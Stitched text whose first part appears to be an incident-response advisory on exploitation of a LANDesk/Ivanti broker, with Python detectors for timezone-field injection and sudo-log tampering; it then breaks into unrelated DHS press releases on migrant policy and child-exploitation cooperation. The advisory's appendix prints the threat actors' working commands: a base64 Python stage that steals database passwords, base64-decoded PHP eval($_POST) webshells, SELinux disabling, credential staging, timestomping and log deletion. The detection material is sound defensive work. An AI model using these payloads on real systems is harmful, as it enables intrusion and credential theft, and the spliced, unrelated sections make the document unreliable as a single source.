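    "staged_script": re.compile(r"base64\s+-d\s*\|\s*(?:/usr/bin/|/bin/)?(?:python|bash|sh)\b"),
    "db_access": re.compile(r"\bpsql\b|PGPASSWORD"),
}


def lenient_b64(s):
    """Decode base64 that may lack padding; None if it is not base64 at all."""
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s).decode("utf-8", "replace")
    except ValueError:
        return None


def triage_timezone_log(text):
    """One finding per event whose timezone value is not a plain zone name."""
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        tz = m.group("tz")
        if VALID_TZ.match(tz) and not SHELL_META.search(tz):
            continue  # legitimate change; nothing to report
        finding = {"ts": m.group("ts"), "pid": int(m.group("pid")),
                   "injected": tz, "decoded": None, "interpreter": None}
        staged = B64_PIPE.search(tz)
        if staged:
            finding["decoded"] = lenient_b64(staged.group("b64"))
            finding["interpreter"] = staged.group("interp")
        # Tag and extract IOCs from the injected text plus whatever the stage decoded to.
        visible = tz + " " + (finding["decoded"] or "")
        finding["tags"] = sorted(k for k, rx in TAGS.items() if rx.search(visible))
        finding["iocs"] = sorted(set(IPV4.findall(visible)) | set(URL.findall(visible)))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage_timezone_log(SAMPLE_LOG):
        print(f["ts"], f["pid"], f["tags"], f["iocs"], f["decoded"] or "")
```

The zone-name allowlist does the real work: a command injection has to carry metacharacters, but rather than enumerate them the check rejects any value that is not shaped like an IANA zone, which also catches payloads that use only characters the metacharacter list misses. Decoding the stage matters because the downloader or reverse-shell address is often only visible inside it.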

Appendix B: Sudo Commands

See Table 14 for a list of known sudo commands executed by the threat actors.

Command Use
sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2
U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;

Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64. 

The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database.

nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 Temporarily disables SELinux.
sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf Exfiltrates credentials and places them in a site.cnf webfile.
sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php Creates a webshell at view.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq

FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm

9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;

Creates a webshell at help.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/GSB main page/GSB main pageneval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/g' /opt/landesk/broker/webroot/client/index.php Adds a webshell into index.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;nteval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/' /opt/landesk/broker/webroot/gsb/style.php
Adds a webshell into style.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php
Timestomping attempt to change the access and modification time of index.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
Timestomping attempt to change the access and modification time of style.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Timestomping attempt to change the access and modification time of DateTimeTab.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php
Timestomping attempt to change the access and modification time of help.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
Removes evidence.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
Removes site.cnf file (exfiltrated credentials).

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
Removes one of the original webshells.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php
Removes one of the original webshells.
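To turn entries like these into a detection rather than a post-hoc reading, here is an added example (not part of the original report and not the vendor's own tooling) that parses sudo records in this format, splits the `sh -c` compound command with a quote-aware lexer, and tags the behaviours the table shows: PHP `eval`/`$_POST` written into a `.php` file via `sed -i`, `touch -r` timestomping, and removal of logs, configuration files and web files. The sample log lines, the `SERVICE_ACCOUNTS` set and the `PARAM` placeholder in the sed script are constructed for the example; the paths mirror the entries above.

```python
"""Tag anti-forensic and webshell-planting commands in sudo log records."""
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# sudo's default syslog format; search() tolerates a "Mon DD hh:mm:ss host" prefix.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
# PHP constructs that have no business being written into a file from a shell.
PHP_INJECT_RE = re.compile(r"eval\s*\(|\$_(?:POST|GET|REQUEST|COOKIE)\b")
LOG_DIRS = ("/var/log/",)
# Web/service accounts that should never reach root without a terminal (constructed).
SERVICE_ACCOUNTS = {"gsbadmin", "www-data", "apache"}


@dataclass
class SudoEvent:
    user: str
    tty: str
    pwd: str
    runas: str
    cmd: str
    findings: List[str] = field(default_factory=list)


def parse_sudo_line(line: str) -> Optional[SudoEvent]:
    """Return a SudoEvent for a sudo command record, None for any other line."""
    m = SUDO_RE.search(line.strip())
    return SudoEvent(**m.groupdict()) if m else None


def split_commands(cmd: str) -> List[List[str]]:
    """Split a `sh -c` compound command on unquoted ';' into argv lists.

    The sed script in the log carries ';' inside single quotes, so a naive
    str.split(';') would tear the command apart and miss the injection.
    """
    m = re.match(r"^\S*/sh\s+-c\s+(.*)$", cmd)
    body = m.group(1) if m else cmd
    try:
        lexer = shlex.shlex(body, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        tokens = list(lexer)
    except ValueError:  # unbalanced quotes: fall back to a crude split
        tokens = body.replace(";", " ; ").split()
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in tokens:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def classify(ev: SudoEvent) -> SudoEvent:
    """Attach detection tags to a parsed event and return it."""
    if ev.tty == "unknown" and ev.runas == "root" and ev.user in SERVICE_ACCOUNTS:
        # No controlling terminal: spawned by a process (e.g. a web server), not a person.
        ev.findings.append("root_sudo_without_tty")
    for argv in split_commands(ev.cmd):
        prog = argv[0].rsplit("/", 1)[-1]
        args = argv[1:]
        targets = [a for a in args if not a.startswith("-")]
        if prog == "sed" and "-i" in args:
            if any(PHP_INJECT_RE.search(a) for a in args) and any(t.endswith(".php") for t in targets):
                ev.findings.append("webshell_injection")
        elif prog == "touch" and "-r" in args:
            # touch -r copies another file's timestamps onto the target: timestomping.
            ev.findings.append("timestomping")
        elif prog == "rm":
            if any(t.startswith(LOG_DIRS) for t in targets):
                ev.findings.append("log_removal")
            if any(t.endswith(".php") for t in targets):
                ev.findings.append("web_file_removal")
            if any(t.endswith((".cnf", ".conf")) for t in targets):
                ev.findings.append("config_removal")
    return ev


def scan_log(text: str) -> List[SudoEvent]:
    """Return only the events that triggered at least one finding."""
    flagged = []
    for line in text.splitlines():
        ev = parse_sudo_line(line)
        if ev and classify(ev).findings:
            flagged.append(ev)
    return flagged


def tally(events: List[SudoEvent]) -> Dict[str, int]:
    """Count findings across events, for a quick triage summary."""
    counts: Dict[str, int] = {}
    for ev in events:
        for f in ev.findings:
            counts[f] = counts.get(f, 0) + 1
    return counts


# Constructed sample records modelled on the entries above (PARAM is a placeholder).
SAMPLE_LOG = r"""
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;eval($_POST["PARAM"]);/' /opt/landesk/broker/webroot/gsb/style.php
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
Jan 28 10:15:02 gsbhost sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
"""

if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        print(ev.user, ev.tty, ", ".join(ev.findings))
    print(tally(scan_log(SAMPLE_LOG)))
```

The administrator's interactive `systemctl` line and the `pam_unix` session line produce no findings, which is the point of parsing rather than grepping for `rm`. The `root_sudo_without_tty` tag is worth a rule on its own: every entry in the table has `TTY=unknown`, meaning the command came from a process with no terminal, which for a web application account is abnormal regardless of what the command did.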

DHS Reinstates Migrant Protection Protocols

Source: US Department of Homeland Security

WASHINGTON – The Department of Homeland Security (DHS) Acting Secretary Benjamine Huffman reinstated the Migrant Protection Protocols (MPP) effective immediately.

On January 25, 2019, Department of Homeland Security (DHS) Secretary Kirstjen Nielsen issued Policy Guidance for Implementation of the Migrant Protection Protocols (the MPP Policy). The MPP Policy is an exercise of the authority granted to DHS pursuant to Section 235(b)(2)(c) of the Immigration and Nationality Act (INA). That authority permits the Secretary of DHS to return certain applicants for admission to the adjoining country from which they are arriving pending the completion of removal proceedings pursuant to Section 240 of the INA.

Between Jan. 20, 2021, and Oct. 29, 2021, Acting Secretary David Pekoske, and later Secretary Alejandro Mayorkas, repeatedly attempted to suspend or terminate the MPP Policy. Following a series of legal actions, Secretary Mayorkas’s final attempt to terminate the MPP Policy was stayed by a federal court. See Order Granting Stay, Texas v. Biden, 2:21-cv-67 (N.D. Tex. Dec. 15, 2022). The Department of Justice, seven months after that stay was entered, voluntarily dismissed the federal government’s appeal, acquiescing to keeping the MPP Policy in effect for the foreseeable future. See Texas v. Biden, No. 23-10143 (5th Cir. Jul. 17, 2023).

According to representations made by the federal government in court, DHS at all times complied with that court order, but the facts on the ground “render[ed] restarting MPP impossible.” Defendants’ Supplemental Response Brief at 10, Texas v. Biden, 2:21-cv-67 (N.D. Tex. Oct. 6, 2023). The situation at the border has changed and the facts on the ground are favorable to resuming implementation of the 2019 MPP Policy. 

Statement from a DHS Spokesperson on Directives Expanding Law Enforcement and Ending the Abuse of Humanitarian Parole

Source: US Department of Homeland Security

WASHINGTON – Yesterday, Acting Department of Homeland Security Secretary Benjamine Huffman issued two directives essential to ending the invasion of the US southern border and to empowering law enforcement to protect Americans. 

The first directive rescinds the Biden Administration’s guidelines for Immigration and Customs Enforcement (ICE) and Customs and Border Protection (CBP) enforcement actions that thwart law enforcement in or near so-called “sensitive” areas. The second directive ends the broad abuse of humanitarian parole and returns the program to a case-by-case basis. ICE and CBP will phase out any parole programs that are not in accordance with the law. The following statement is attributable to a DHS Spokesperson:

“This action empowers the brave men and women in CBP and ICE to enforce our immigration laws and catch criminal aliens—including murderers and rapists—who have illegally come into our country. Criminals will no longer be able to hide in America’s schools and churches to avoid arrest. The Trump Administration will not tie the hands of our brave law enforcement, and instead trusts them to use common sense.

“The Biden-Harris Administration abused the humanitarian parole program to indiscriminately allow 1.5 million migrants to enter our country. This was all stopped on day one of the Trump Administration. This action will return the humanitarian parole program to its original purpose of looking at migrants on a case-by-case basis.” 

Statement from Acting Secretary Huffman on US Border Patrol Agent Killed in Line of Duty

Source: US Department of Homeland Security

WASHINGTON – Acting Secretary of Homeland Security Benjamine Huffman issued the following statement on the death of a US Border Patrol Agent:

“Today, January 20, a Border Patrol agent assigned to the US Border Patrol’s Swanton Sector was fatally shot in the line of duty.

“Every single day, our Border Patrol agents put themselves in harm’s way so that Americans and our homeland are safe and secure. My prayers and deepest condolences are with our Department, the Agent’s family, loved ones, and colleagues.

“This incident is being swiftly investigated and DHS will release additional information as soon as it becomes available.” 

Statement from Australia – United States Joint Council on Combating Online Child Sexual Exploitation Following Safety by Design Workshop with Industry, Global Experts

Source: US Department of Homeland Security

Council Plans to Release Child Safety Toolkit Later this Year

WASHINGTON – On December 10 – December 11, 2024, Australia’s eSafety Commissioner and Department of Homeland Security under the Australia – United States Joint Council on Combating Online Child Sexual Exploitation hosted over 20 technology, non-governmental, academic, and civil society sector organizations for a two-day workshop aimed at establishing new areas of collaboration to combat online child sexual exploitation and abuse (CSEA). Held in person at the Homeland Security Investigations Lab in Washington, D.C., the workshop included presentations by industry leaders, roundtable discussions, and breakout groups. 

The Joint Council will build on the outputs of this workshop and continue to work with industry to develop a Safety by Design toolkit to ensure that child safety is prioritized at every stage in the development of online products and services, including in new and emerging artificial intelligence technologies. The toolkit is expected to collate best practices and share innovative approaches for companies to tackle online CSEA, while also exploring the challenges and limitations of adopting Safety by Design principles. It is scheduled for publication in mid-2025.

This latest Joint Council engagement builds on work led by DHS and the Australian Government to eradicate online CSEA and enhance international cooperation, technological innovation, and public education as these crimes increasingly threaten the safety of children globally. Chaired by U.S. Department of Homeland Security Secretary Alejandro N. Mayorkas and Australian Attorney-General Mark Dreyfus KC MP, the Joint Council brings together U.S. and Australian policy, regulatory, and law enforcement agencies to share best practices and enlist other nations in this critical fight to ensure the safety and well-being of children all over the world.

Quote attributable to DHS Acting Policy Under Secretary Robert Paschall:

“The scourge of child exploitation covers the world: from India to Pakistan, the Philippines to Australia and Europe to here at home in the United States. This crime is an affront to our most fundamental values. Combatting it in partnership with our allies in government, the private sector and civil society is integral to the DHS mission. 

“As new and emerging technologies like generative artificial intelligence further highlight the risk of harm to youth, the Joint Council remains steadfast in combatting all forms of child exploitation and abuse. My colleagues and I at DHS were proud to co-lead this workshop. By providing actionable strategies to minimize threats and harms throughout the design, development and deployment of new technologies, the Safety by Design Toolkit will further strengthen the safety and well-being of children around the world. This latest Joint Council collaboration builds on several efforts led by the Australian Government and the Department of Homeland Security over the past year, including the Know2Protect public awareness campaign in the United States and One Talk at a Time in Australia.”

Quote attributable to eSafety Commissioner Julie Inman Grant:

“We’ve reached a tipping point in online safety, particularly in protecting children from online harms. Safety by Design is no longer just a boardroom concept – it needs to be a regular part of the conversation in parliaments and classrooms. 

“That is why we were so pleased to co-lead this workshop with the United States Department of Homeland Security demonstrating that companies, governments, and regulators can work together to build safer technology platforms, especially on this most critical of issues: protecting children from online sexual exploitation and abuse.

“In Australia, ongoing reforms to the Online Safety Act, including the recent move to legislate minimum age requirements for certain social media platforms, are helping to establish a framework that compels industry to meet higher safety standards, including placing the best interests of children at the heart of the development process.

“Through these efforts, by harnessing the collective goodwill of the US and Australian governments alongside the global technology sector, and incorporating safety protections from the outset, we can better safeguard users and combat child sexual exploitation and abuse.”

Background

On May 20, 2023, President Biden and Prime Minister Albanese issued a joint leaders’ statement to renew the long-standing partnership between Australia and the United States. The Statement recognized the need to enhance our joint response to a range of challenges, including the growing rate and severity of online child sexual exploitation and abuse. Both countries decided to establish the Australia-United States Joint Council on Combatting Online Child Sexual Exploitation (Joint Council). 

The Council has developed a joint, multidisciplinary workplan across six workstreams, including Safety by Design. Safety by Design was pioneered in Australia by the eSafety Commissioner and continues to gain momentum across the United States and the world.

How to Report Suspected Online Child Sexual Exploitation and Abuse

To learn more about the threat of online child sexual exploitation and abuse in the United States please visit Know2Protect.gov. Early intervention is crucial. If exploitation happens, approach conversations with care and empathy and report immediately to the Know2Protect Tipline at 833-591-KNOW (5669) or visit the NCMEC CyberTipline. All information received via the Tipline will be reviewed by appropriate personnel and referred to HSI field offices for potential investigation. 

In Australia, if you think a child is in immediate danger call Triple Zero (000). Anonymous reports can be made to Crime Stoppers at https://crimestoppers.com.au or call their toll-free number 1800 333 000. To report online child sexual abuse, including child sexual abuse material, please contact the Australian Centre to Counter Child Exploitation and use the Report Abuse button at https://www.accce.gov.au/report. You can also report illegal content, including online child sexual exploitation and abuse material, to the eSafety Commissioner at https://www.esafety.gov.au/report/how-to-report-serious-online-abuse-illegal-restricted-content.